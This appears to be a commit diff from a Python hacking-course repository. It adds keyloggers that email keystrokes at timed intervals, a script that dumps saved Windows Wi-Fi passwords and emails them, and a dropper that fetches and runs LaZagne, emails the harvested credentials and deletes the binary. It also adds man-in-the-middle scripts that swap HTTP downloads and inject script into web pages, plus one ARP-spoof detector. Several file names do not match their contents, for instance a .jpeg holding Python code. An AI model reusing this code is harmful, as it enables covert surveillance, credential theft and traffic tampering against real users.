Updated

Author: root

10 arpspoof_detector/arpspoof_detector.py

@@ -0,0 +1,30 @@
+#!/usr/bin/python2
+
+import scapy.all as scapy
+
+def getmac(ip):
+
+	arp_request_header = scapy.ARP(pdst = ip)
+	ether_header = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
+	arp_request_packet = ether_header/arp_request_header
+	answered_list = scapy.srp(arp_request_packet,timeout=1,verbose=False)[0]
+	return  answered_list[0][1].hwsrc
+
+def sniff(interface):
+
+	scapy.sniff(iface=interface,store=False,prn=process_sniffed_packet)
+
+def process_sniffed_packet(packet):
+
+	if packet.haslayer(scapy.ARP) and packet[scapy.ARP].op==2:
+		try:
+			real_mac = getmac(packet[scapy.ARP].psrc)
+			response_mac = packet[scapy.ARP].hwsrc
+
+			if real_mac != response_mac:
+				print ("[+] You are under attack !!")
+
+		except IndexError:
+			pass
+			
+sniff("wlan0")

11 execute_sys_cmd_report/execute_cmd.py

@@ -0,0 +1,9 @@
+#!/usr/bin/python2.7
+
+import subprocess
+
+command = "pstree"
+
+subprocess.Popen(command,shell=True)
+
+#process open Popen

11 execute_sys_cmd_report/execute_cmd_report.py

@@ -0,0 +1,16 @@
+#!/usr/bin/python2.7
+
+import subprocess
+import smtplib
+
+def send_mail(email,password,message):
+
+	server = smtplib.SMTP("smtp.gmail.com",587)
+	server.starttls()
+	server.login(email,password)
+	server.sendmail(email,email,message)
+	server.quit()
+
+command = "ifconfig"
+result = subprocess.check_output(command,shell=True)
+send_mail("[email protected]","Asdfjkl;1",result)

11 execute_sys_cmd_report/reeport_windows_wifipassword_toemail.py

@@ -0,0 +1,26 @@
+#!/usr/bin/python2.7
+
+import subprocess
+import smtplib
+import re
+
+def send_mail(email,password,message):
+
+	server = smtplib.SMTP("smtp.gmail.com",587)
+	server.starttls()
+	server.login(email,password)
+	server.sendmail(email,email,message)
+	server.quit()
+
+command = "netsh wlan show profile"
+networks = subprocess.check_output(command,shell=True)
+network_names_list = re.findall("(?:Profile\s*:\s)(.*)",networks)
+
+result = ""
+for network_name in network_names_list:
+	command = "netsh wlan show profile" +network_name+" key=clear"
+	current_result = subprocess.check_output(command,shell=True)
+	result = result + current_result
+
+
+send_mail("[email protected]","Asdfjkl;1",result)

12 download_file/download_file.py

@@ -0,0 +1,15 @@
+#!/usr/bin/python2
+
+import requests
+
+def download(url):
+
+	get_request = requests.get(url)
+	#print (get_request.content)
+	#print (get_request)
+
+	with open("lamborghini.jpeg","w") as file:
+		file.write(get_request.content)
+
+download("https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQcQC7LyJgwpvRiGdxviJlf1O64vr8QUgB7ktqe3MYCapQIltZRig")
+

12 download_file/lamborghini.jpeg

@@ -0,0 +1,31 @@
+#!/usr/bin/python2.7
+
+import requests
+import subprocess
+import smtplib
+import os
+import tempfile
+
+def download(url):
+
+	get_request = requests.get(url)
+	#print (get_request.content)
+	#print (get_request)
+
+	with open("lazagne.exe","w") as file:
+		file.write(get_request.content)
+
+def send_mail(email,password,message):
+
+	server = smtplib.SMTP("smtp.gmail.com",587)
+	server.starttls()
+	server.login(email,password)
+	server.sendmail(email,email,message)
+	server.quit()
+
+temp_directory = tempfile.gettempdir()
+os.chdir(temp_directory)
+download("http://localhost where lazagne .exe is stored")
+result = subprocess.check_output("lazagne.exe all",shell=True)
+send_mail("[email protected]","Asdfjkl;1",result)
+os.remove("lazagne.exe")

13 recover_saved_passwd_on_target/LaZagne.zip

@@ -0,0 +1,10 @@
+#!/usr/bin/python
+
+import pynput.keyboard
+
+def process_key_press(key):
+	print (key)
+
+keyboard_listener=pynput.keyboard.Listener(on_press=process_key_press)
+with keyboard_listener:
+	keyboard_listener.join()

13 recover_saved_passwd_on_target/download_lazagne_execute_report_toemail.py

@@ -0,0 +1,21 @@
+#!/usr/bin/python
+
+import pynput.keyboard
+
+log = ""
+
+def process_key_press(key):
+	global log
+	try:
+		log = log + str(key.char)
+	except AttributeError:
+		if key == key.space:
+			log = log + " "
+		else:	
+			log = log +" " + str(key) + " "
+
+	print log
+
+keyboard_listener=pynput.keyboard.Listener(on_press=process_key_press)
+with keyboard_listener:
+	keyboard_listener.join()

14 keylogger/keylogger_1.py

@@ -0,0 +1,30 @@
+#!/usr/bin/python
+
+import pynput.keyboard
+import threading
+
+log = ""
+
+def process_key_press(key):
+	global log
+	try:
+		log = log + str(key.char)
+	except AttributeError:
+		if key == key.space:
+			log = log + " "
+		else:	
+			log = log +" " + str(key) + " "
+
+	print (log)
+
+def report():
+	global log
+	print (log)
+	log = ""
+	timer = threading.Timer(5,report)
+	timer.start()
+
+keyboard_listener=pynput.keyboard.Listener(on_press=process_key_press)
+with keyboard_listener:
+	report()
+	keyboard_listener.join()

14 keylogger/keylogger_2.py

@@ -0,0 +1,48 @@
+#!/usr/bin/python
+
+import pynput.keyboard
+import threading
+import smtplib
+
+log = ""
+
+class Keylogger:
+	def __init__(self,time_interval,email,password):
+		self.log = "Keylogger started"
+		self.interval = time_interval
+		self.email = email
+		self.password = password
+		#print ("We are in constructor method")
+
+	def append_to_log(self,string):
+		self.log = self.log + string
+
+	def process_key_press(self,key):
+		try:
+			current_key = str(key.char)
+		except AttributeError:
+			if key == key.space:
+				current_key = " "
+			else:	
+				current_key = " " + str(key) + " "
+		self.append_to_log(current_key)
+
+	def report(self):
+		#print (self.log)
+		self.send_mail(self.email,self.password,"\n\n"+self.log)
+		self.log = ""
+		timer = threading.Timer(self.interval,self.report)
+		timer.start()
+
+	def send_mail(self,email,password,message):
+		server = smtplib.SMTP("smtp.gmail.com",587)
+		server.starttls()
+		server.login(email,password)
+		server.sendmail(email,email,message)
+		server.quit()
+
+	def start(self):
+		keyboard_listener=pynput.keyboard.Listener(on_press=self.process_key_press)
+		with keyboard_listener:
+			self.report()
+			keyboard_listener.join()

14 keylogger/keylogger_3.py

@@ -0,0 +1,6 @@
+#!/usr/bin/python
+
+import keylogger_4
+
+my_keylogger = keylogger_4.Keylogger(120,"[email protected]","Asdfjkl;1")
+my_keylogger.start()

14 keylogger/keylogger_4.py

@@ -42,13 +42,13 @@ def getmac_all(ip_range):
 
 	return clients_list
 
-ip_mac = getmac_all(ip_range)
-#ip_mac = getmac_all("192.168.43.1/24")
+
+ip_mac = getmac_all("192.168.43.1/24")
 print ip_mac
 
 def getmac(ip_addr):
 	for items in ip_mac:
-		if ip_addr in items.keys()
+		if ip_addr in items.keys():
 			mac_addr = items[ip_addr]
 			return mac_addr
 

14 keylogger/keylogger_4.pyc

@@ -0,0 +1 @@
+iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

14 keylogger/zlogger.py

@@ -0,0 +1,16 @@
+#!/usr/bin/python2
+#capture the request packet from client and save to a queue using iptables and alter send or recieve modified packet
+#iptables commands iptables -I FORWARD -j NFQUEUE --queue-num 0
+
+import netfilterqueue
+
+
+def process_packet(packet):
+	print packet
+	packet.accept()
+
+queue = netfilterqueue.NetfilterQueue()
+queue.bind(0,process_packet)
+queue.run()
+
+

3 arp_spoof/arp_spoof-1.py

@@ -0,0 +1,15 @@
+#!/usr/bin/python2
+#capture the request packet from client and save to a queue using iptables and alter to send or recieve modified packet
+#drop the packet cut the netconnection because packet.accept() is not specified
+
+import netfilterqueue
+
+
+def process_packet(packet):
+	print packet
+
+queue = netfilterqueue.NetfilterQueue()
+queue.bind(0,process_packet)
+queue.run()
+
+

3 arp_spoof/arp_spoof-2.py

@@ -0,0 +1,40 @@
+#!/usr/bin/python2.7
+
+import netfilterqueue
+import scapy.all as scapy
+
+
+ack_list=[]
+
+def set_load(packet,load):
+	packet[scapy.Raw].load=load
+	del packet[scapy.IP].len
+	del packet[scapy.IP].chksum
+	del packet[scapy.TCP].chksum
+	return packet
+
+
+def process_packet(packet):
+	scapy_packet=scapy.IP(packet.get_payload())
+	if scapy_packet.haslayer(scapy.Raw):
+		
+		if scapy_packet[scapy.TCP].dport == 80:
+			if ".pdf" in scapy_packet[scapy.Raw].load:
+				print "PDF Request"
+				ack_list.append(scapy_packet[scapy.TCP].ack)
+				print scapy_packet.show()
+
+		elif scapy_packet[scapy.TCP].sport == 80:
+			if scapy_packet[scapy.TCP].seq in ack_list:
+				ack_list.remove(scapy_packet[scapy.TCP].seq)
+				print 'Replacing files'
+				modified_packet = set_load(scapy_packet,"HTTP/1.1 301 Moved Permanently\nLocation: https://www.rarlab.com/rar/winrar-x64-561.exe\n\n")
+				
+				packet.set_payload(str(modified_packet))
+	
+	packet.accept()
+
+
+queue=netfilterqueue.NetfilterQueue()
+queue.bind(0,process_packet)
+queue.run()

3 arp_spoof/arp_spoof-3.py

@@ -0,0 +1,45 @@
+#!/usr/bin/python2.7
+
+import netfilterqueue
+import scapy.all as scapy
+import re
+
+
+ack_list=[]
+
+def set_load(packet,load):
+	packet[scapy.Raw].load=load
+	del packet[scapy.IP].len
+	del packet[scapy.IP].chksum
+	del packet[scapy.TCP].chksum
+	return packet
+
+
+def process_packet(packet):
+	scapy_packet=scapy.IP(packet.get_payload())
+	if scapy_packet.haslayer(scapy.Raw):
+		
+		if scapy_packet[scapy.TCP].dport == 80:
+			print "[+]Request "
+			#print scapy_packet.show()
+			modified_load = re.sub("Accept-Encoding:.*?\\r\\n","",scapy_packet[scapy.Raw].load)
+			new_packet=set_load(scapy_packet,modified_load)
+			packet.set_payload(str(new_packet))
+			print scapy_packet.show()    
+
+
+		elif scapy_packet[scapy.TCP].sport == 80:
+			print "[+] Response "
+			print scapy_packet.show()
+			modified_load=scapy_packet[scapy.Raw].load.replace("</body>","<script>alert('test');</script></body>")
+			#modified_load=scapy_packet[scapy.Raw].load.replace("<body>","<body><script>alert('test');</script>")
+			new_packet=set_load(scapy_packet,modified_load)
+			packet.set_payload(str(new_packet))
+			#print scapy_packet.show()
+
+	packet.accept()
+
+
+queue=netfilterqueue.NetfilterQueue()
+queue.bind(0,process_packet)
+queue.run()